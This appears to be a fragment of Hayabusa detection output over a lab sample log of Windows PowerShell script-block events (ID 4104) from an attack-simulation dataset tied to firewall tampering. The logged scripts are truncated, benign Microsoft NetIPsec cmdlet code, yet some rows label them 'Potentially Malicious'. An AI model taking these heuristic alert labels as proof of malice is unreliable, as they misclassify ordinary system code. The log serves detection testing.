$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdleti",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"em.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') 
-and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } 
else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdleti",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"zation_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { 
$__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 
[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"zation_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 